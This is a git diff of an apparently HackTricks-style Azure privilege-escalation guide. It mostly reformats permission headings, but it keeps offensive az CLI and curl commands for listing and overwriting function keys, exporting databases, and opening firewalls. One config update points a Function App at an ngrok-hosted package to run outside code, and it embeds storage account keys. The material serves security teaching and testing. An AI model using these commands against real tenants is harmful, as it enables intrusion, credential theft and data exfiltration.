@@ -44,7 +44,7 @@ az sql elastic-pool update \
--tags <key=value>
```
### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"
### `Microsoft.Sql/servers/auditingSettings/read` && `Microsoft.Sql/servers/auditingSettings/write`
With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.
@@ -57,7 +57,7 @@ az sql server audit-policy update \
--retention-days 7
```
### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"
### `Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read`, `Microsoft.Sql/servers/connectionPolicies/read` && `Microsoft.Sql/servers/connectionPolicies/write`
With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings
@@ -68,7 +68,7 @@ az sql server connection-policy update \
--connection-type <Proxy|Redirect|Default>
```
### "Microsoft.Sql/servers/databases/export/action"
### `Microsoft.Sql/servers/databases/export/action`
With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.
@@ -84,7 +84,7 @@ az sql db export \
```
### "Microsoft.Sql/servers/databases/import/action"
### `Microsoft.Sql/servers/databases/import/action`
With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.
@@ -96,7 +96,7 @@ az sql db import --admin-user <admin-user> \
--resource-group <resource-group-name> \
--storage-key-type SharedAccessKey \
--storage-key <storage-account-key> \
--storage-uri "https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"
--storage-uri `https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac`
```
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
View File

@@ -5,15 +5,14 @@
## CosmosDB Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-cosmosDB.md" %}
[az-cosmosDB.md](../az-services/az-cosmosDB.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-cosmosDB.md
{{#endref}}
### ("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")
### (`Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read`) & (`Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read`)
With this permissions you can priviledge scalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.
{% code overflow="wrap" %}
```bash
az cosmosdb sql role definition create \
--account-name <account_name> \
@@ -36,11 +35,9 @@ az cosmosdb sql role definition create \
]
}'
```
{% endcode %}
After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.
{% code overflow="wrap" %}
```bash
az cosmosdb sql role assignment create \
--account-name <account_name> \
@@ -49,19 +46,16 @@ az cosmosdb sql role assignment create \
--principal-id <principal_id-togive-perms> \
--scope "/"
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/listKeys/action"
### `Microsoft.DocumentDB/databaseAccounts/listKeys/action`
With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.
{% code overflow="wrap" %}
```bash
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
View File

@@ -126,7 +126,7 @@ az storage blob upload \
--overwrite
```
### Microsoft.Web/sites/host/listkeys/action
### `Microsoft.Web/sites/host/listkeys/action`
This permission allows to list the function, master and system keys, but not the host one, of the specified function with:
@@ -159,7 +159,7 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro
-v
```
### Microsoft.Web/sites/functions/listKeys/action
### `Microsoft.Web/sites/functions/listKeys/action`
This permission allows to get the host key, of the specified function with:
@@ -167,7 +167,7 @@ This permission allows to get the host key, of the specified function with:
az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
```
### Microsoft.Web/sites/host/functionKeys/write
### `Microsoft.Web/sites/host/functionKeys/write`
This permission allows to create/update a function key of the specified function with:
@@ -175,7 +175,7 @@ This permission allows to create/update a function key of the specified function
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/host/masterKey/write
### `Microsoft.Web/sites/host/masterKey/write`
This permission allows to create/update a master key to the specified function with:
@@ -186,7 +186,7 @@ az functionapp keys set --resource-group <res_group> --key-name <key-name> --key
> [!CAUTION]
> Remember that with this key you can also access the source code and modify it as explained before!
### Microsoft.Web/sites/host/systemKeys/write
### `Microsoft.Web/sites/host/systemKeys/write`
This permission allows to create/update a system function key to the specified function with:
@@ -194,7 +194,7 @@ This permission allows to create/update a system function key to the specified f
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/config/list/action
### `Microsoft.Web/sites/config/list/action`
This permission allows to get the settings of a function. Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**.
@@ -209,7 +209,7 @@ az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"
```
### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/write`
These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located.
@@ -247,7 +247,7 @@ az rest --method PUT \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
```
### Microsoft.Web/sites/hostruntime/vfs/write
### `Microsoft.Web/sites/hostruntime/vfs/write`
With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint):
@@ -260,7 +260,7 @@ az rest --method PUT \
--body @/tmp/body
```
### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`)
This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**:
@@ -345,7 +345,7 @@ put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and depl
_Note that the **FTP username** is usually in the format \<app-name>\\$\<app-name>._
### Microsoft.Web/sites/hostruntime/vfs/read
### `Microsoft.Web/sites/hostruntime/vfs/read`
This permission allows to **read the source code** of the app through the VFS:
@@ -353,7 +353,7 @@ This permission allows to **read the source code** of the app through the VFS:
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
### Microsoft.Web/sites/functions/token/action
### `Microsoft.Web/sites/functions/token/action`
With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code.
@@ -369,7 +369,7 @@ curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
-H "Authorization: Bearer <token>"
```
### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)
### `Microsoft.Web/sites/config/write`, (`Microsoft.Web/sites/functions/properties/read`)
This permissions allows to **enable functions** that might be disabled (or disable them).
@@ -387,7 +387,7 @@ It's also possible to see if a function is enabled or disabled in the following
az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
```
### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)
### `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`)
With these permissions it's possible to **modify the container run by a function app** configured to run a container. This would allow an attacker to upload a malicious azure function container app to docker hub (for example) and make the function execute it.
@@ -397,7 +397,7 @@ az functionapp config container set --name <app-name> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"
```
### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)
### `Microsoft.Web/sites/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/operationresults/read`)
With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity.

2
src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about this service check:
../az-services/az-keyvault.md
{{#endref}}
### Microsoft.KeyVault/vaults/write
### `Microsoft.KeyVault/vaults/write`
An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).

14
src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
View File

@@ -5,15 +5,14 @@
## Logic Apps Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-logic-apps.md" %}
[az-logic-apps.md](../az-services/az-logic-apps.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-logic-apps.md
{{#endref}}
### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action")
### (`Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.Logic/workflows/read`, `Microsoft.Logic/workflows/write` && `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`) && (`Microsoft.Logic/workflows/triggers/run/action`)
With this permission, you can create or update, Azure Logic Apps workflows. Workflows define automated processes and integrations between various systems and services.
{% code overflow="wrap" %}
```bash
az logic workflow create \
--resource-group <resource_group_name> \
@@ -26,7 +25,6 @@ az logic workflow update \
--resource-group logicappgroup \
--definition <workflow_definition_file.json>
```
{% endcode %}
And after changing it, you can run it with:
@@ -38,17 +36,15 @@ az rest \
--headers "Content-Type=application/json"
```
### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
### (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/basicPublishingCredentialsPolicies/read`, `Microsoft.Web/sites/write`, `Microsoft.Web/sites/config/list/action`) && (`Microsoft.Web/sites/start/action`)
With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. Alongside the start permissions you can update and deploy a new Logic App with the content desired
{% code overflow="wrap" %}
```bash
az logicapp deployment source config-zip \
--name <logic_app_name> \
--resource-group <resource_group_name> \
--src <path_to_zip_file>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

19
src/pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md
View File

@@ -2,19 +2,17 @@
{{#include ../../../banners/hacktricks-training.md}}
## MySQL Database Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-mysql.md" %}
[az-mysql.md](../az-services/az-mysql.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-mysql.md
{{#endref}}
### ""Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"
### `Microsoft.DBforMySQL/flexibleServers/read` && `Microsoft.DBforMySQL/flexibleServers/write`
With this permission, you can create, update, or delete MySQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
{% code overflow="wrap" %}
```bash
az mysql flexible-server create \
--name <ServerName> \
@@ -27,32 +25,26 @@ az mysql flexible-server create \
--tier <PricingTier> \
--version <MySQLVersion>
```
{% endcode %}
For example, this permissions allow changing the MySQL password, usefull of course in case that MySQL authentication is enabled.
{% code overflow="wrap" %}
```bash
az mysql flexible-server update \
--resource-group <resource_group_name> \
--name <server_name> \
--admin-password <password_to_update>
```
{% endcode %}
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
{% code overflow="wrap" %}
```bash
az mysql flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
```
{% endcode %}
### ""Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforMySQL/flexibleServers/administrators/write" && "Microsoft.DBforMySQL/flexibleServers/administrators/read""
### `Microsoft.DBforMySQL/flexibleServers/read`, `Microsoft.DBforMySQL/flexibleServers/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.DBforMySQL/flexibleServers/administrators/write` && `Microsoft.DBforMySQL/flexibleServers/administrators/read`
With this permission, you can configure Azure Active Directory (AD) administrators for a MySQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the MySQL server. It's important that the flexible-server has a user assigned managed identities to use.
{% code overflow="wrap" %}
```bash
az mysql flexible-server ad-admin create \
--resource-group <ResourceGroupName> \
@@ -61,7 +53,6 @@ az mysql flexible-server ad-admin create \
--identity <IdentityNameOrID> \
--object-id <ObjectID>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md
View File

@@ -5,15 +5,14 @@
## PostgreSQL Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-postgresql.md" %}
{{#ref}}
[az-postgresql.md](../az-services/az-postgresql.md)
{% endcontent-ref %}
{{#endref}}
### "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/write"
### `Microsoft.DBforPostgreSQL/flexibleServers/read` && `Microsoft.DBforPostgreSQL/flexibleServers/write`
With this permission, you can create, update, or delete PostgreSQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
{% code overflow="wrap" %}
```bash
az postgres flexible-server create \
--name <ServerName> \
@@ -26,34 +25,28 @@ az postgres flexible-server create \
--tier <PricingTier> \
--version <PostgreSQLVersion>
```
{% endcode %}
For example, this permissions allow changing the PostgreSQL password, usefull of course in case that PostgreSQL authentication is enabled.
{% code overflow="wrap" %}
```bash
az postgres flexible-server update \
--resource-group <resource_group_name> \
--name <server_name> \
--admin-password <password_to_update>
```
{% endcode %}
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
{% code overflow="wrap" %}
```bash
az postgres flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/read", "Microsoft.DBforPostgreSQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforPostgreSQL/flexibleServers/administrators/write" && "Microsoft.DBforPostgreSQL/flexibleServers/administrators/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/read`, `Microsoft.DBforPostgreSQL/flexibleServers/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.DBforPostgreSQL/flexibleServers/administrators/write` && `Microsoft.DBforPostgreSQL/flexibleServers/administrators/read`
With this permission, you can configure Azure Active Directory (AD) administrators for a PostgreSQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the PostgreSQL server. Updating existing principal is not supported yet so if there is one created you must delete it first.
It's important that the flexible-server has a user assigned managed identities to use.
{% code overflow="wrap" %}
```bash
az postgres flexible-server ad-admin create \
--resource-group <ResourceGroupName> \
@@ -62,7 +55,6 @@ az postgres flexible-server ad-admin create \
--identity <IdentityNameOrID> \
--object-id <ObjectID>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

2
src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
View File

@@ -131,7 +131,7 @@ print("Message Receiving Completed")
print("----------------------------")
```
### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
### `Microsoft.ServiceBus/namespaces/authorizationRules/read` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).

10
src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about SQL Database check:
../az-services/az-sql.md
{{#endref}}
### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
### `Microsoft.Sql/servers/read` && `Microsoft.Sql/servers/write`
With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
@@ -39,7 +39,7 @@ az sql server update \
--enable-public-network true
```
### "Microsoft.Sql/servers/firewallRules/write"
### `Microsoft.Sql/servers/firewallRules/write`
An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
@@ -64,7 +64,7 @@ az sql server firewall-rule update \
Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
### `Microsoft.Sql/servers/ipv6FirewallRules/write`
With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
@@ -80,7 +80,7 @@ az sql server firewall-rule create \
Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
### `Microsoft.Sql/servers/administrators/write` && `Microsoft.Sql/servers/administrators/read`
With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
@@ -92,7 +92,7 @@ az sql server ad-admin create \
--object-id <azure_subscribtion_id>
```
### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
### `Microsoft.Sql/servers/azureADOnlyAuthentications/write` && `Microsoft.Sql/servers/azureADOnlyAuthentications/read`
With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.

22
src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about storage check:
../az-services/az-storage.md
{{#endref}}
### Microsoft.Storage/storageAccounts/listkeys/action
### `Microsoft.Storage/storageAccounts/listkeys/action`
A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
@@ -18,7 +18,7 @@ A principal with this permission will be able to list (and the secret values) of
az storage account keys list --account-name <acc-name>
```
### Microsoft.Storage/storageAccounts/regenerateKey/action
### `Microsoft.Storage/storageAccounts/regenerateKey/action`
A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
@@ -28,7 +28,7 @@ Moreover, in the response, the user will get the value of the renewed key and al
az storage account keys renew --account-name <acc-name> --key key2
```
### Microsoft.Storage/storageAccounts/write
### `Microsoft.Storage/storageAccounts/write`
A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
@@ -42,7 +42,7 @@ az storage account update --name <acc-name> --add networkRuleSet.ipRules value=<
## Blobs Specific privesc
### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete
### `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write` | `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete`
The first permission allows to **modify immutability policies** in containers and the second to delete them.
@@ -64,19 +64,19 @@ az storage container immutability-policy update \
## File shares specific privesc
### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
### `Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action`
This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action`
This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action`
This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
### `Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)`
With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the users permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
@@ -90,7 +90,7 @@ az storage account local-user create \
--has-ssh-key false/true # Depends on the auth method to use
```
### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
### `Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action`
With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
@@ -108,7 +108,7 @@ sftp <storage-account-name>.<local-user-name>@<storage-account-name>.blob.core.w
#regenerated-password
```
### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
### `Microsoft.Storage/storageAccounts/restoreBlobRanges/action`, `Microsoft.Storage/storageAccounts/blobServices/containers/read`, `Microsoft.Storage/storageAccounts/read` && `Microsoft.Storage/storageAccounts/listKeys/action`
With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
@@ -126,7 +126,7 @@ az storage blob undelete \
--name "fileName.txt"
```
### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read
### `Microsoft.Storage/storageAccounts/fileServices/shares/restore/action` && `Microsoft.Storage/storageAccounts/read`
With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.

5
src/pentesting-cloud/azure-security/az-services/az-azuread.md
View File

@@ -952,11 +952,6 @@ Get-AzDenyAssignment # Get from current subscription
Get-AzDenyAssignment -Scope '/subscriptions/96231a05-34ce-4eb4-aa6a-70759cbb5e83/resourcegroups/testRG/providers/Microsoft.Web/sites/site1'
```
{{#endtab }}
{{#endtabs }}
```
{{#endtab }}
{{#tab name="Raw" }}

12
src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
View File

@@ -18,16 +18,16 @@ There aren't permissions assigned to this service, therefore the aren't privileg
## References
* [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
- [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
- [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
- [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
## Persistence
{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %}
[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md)
{% endcontent-ref %}
{{#ref}}
../az-persistence/az-cloud-shell-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

62
src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
View File

@@ -13,11 +13,9 @@ One key aspect of CosmosDB is Azure Cosmos Account. **Azure Cosmos Account**, ac
### NoSQL (sql)
The Azure Cosmos DB NoSQL API is a document-based API that uses JSON as its data format. It provides a SQL-like query syntax for querying JSON objects, making it suitable for working with structured and semi-structured data. The endpoint of the service is:
{% code overflow="wrap" %}
```bash
https://<Account-Name>.documents.azure.com:443/
```
{% endcode %}
#### Databases
Within an account, you can create one or more databases, which serve as logical groupings of containers. A database acts as a boundary for resource management and user permissions. Databases can either share provisioned throughput across their containers or allocate dedicated throughput to individual containers.
@@ -28,9 +26,8 @@ The core unit of data storage is the container, which holds JSON documents and i
#### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# CosmoDB Account
## List Azure Cosmos DB database accounts.
@@ -66,11 +63,9 @@ az cosmosdb sql trigger list --account-name <AccountName> --container-name <Cont
az cosmosdb sql user-defined-function list --account-name <AccountName> --container-name <ContainerName> --database-name <DatabaseName> --resource-group <ResourceGroupName>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```bash
Get-Command -Module Az.CosmosD
@@ -113,14 +108,12 @@ Get-AzCosmosDBSqlTrigger -ResourceGroupName "<ResourceGroupName>" -AccountName "
